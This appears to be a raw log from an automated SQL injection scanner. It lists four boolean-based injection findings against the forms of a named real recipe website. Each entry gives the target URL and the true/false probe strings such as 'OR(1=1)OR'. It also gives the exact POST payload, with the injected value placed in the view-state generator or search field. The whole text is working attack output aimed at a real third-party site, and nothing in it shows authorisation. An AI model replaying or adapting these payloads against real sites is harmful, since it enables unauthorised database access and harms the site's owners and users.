Url: http://realfood.tesco.com/?sem=1&ncid=UKLifestyle22203/b2b/AOLdiet/, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:'OR(1=1)OR' ; FALSE:'OR(1=2)OR', Payload: {'__VIEWSTATE': 'g2LlfonFtBfDrbk4qc6sWrl3HnFjf1czJ0ynCs870EGihCY2xbN1lz39XVUH4TANOPWipg==', '__VIEWSTATEGENERATOR': "'OR(2=2)OR'", 'txtSearch': ''}
Url: http://realfood.tesco.com/?article_id=2159&amp;code=410600/b2b/msndiet/archive.cfm, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:'OR(1=1)OR' ; FALSE:'OR(1=2)OR', Payload: {'__VIEWSTATE': 'pMXKFjWIVpb3qtL19f429WV4jAMZYLAuCAPZFTDXtHDKoBc9o9BYNvXws5tf8uqC3A9vdw==', '__VIEWSTATEGENERATOR': 'CA0B0334', 'txtSearch': "'OR(2=2)OR'"}
Url: http://realfood.tesco.com/?sem=1&ncid=UKLifestyle22203/b2b/AOLdiet/, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:"OR(1=1)OR" ; FALSE:"OR(1=2)OR", Payload: {'__VIEWSTATE': 'g2LlfonFtBfDrbk4qc6sWrl3HnFjf1czJ0ynCs870EGihCY2xbN1lz39XVUH4TANOPWipg==', '__VIEWSTATEGENERATOR': '"OR(2=2)OR"', 'txtSearch': ''}
Url: http://realfood.tesco.com/?article_id=2159&amp;code=410600/b2b/msndiet/archive.cfm, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:"OR(1=1)OR" ; FALSE:"OR(1=2)OR", Payload: {'__VIEWSTATE': 'pMXKFjWIVpb3qtL19f429WV4jAMZYLAuCAPZFTDXtHDKoBc9o9BYNvXws5tf8uqC3A9vdw==', '__VIEWSTATEGENERATOR': 'CA0B0334', 'txtSearch': '"OR(2=2)OR"'}
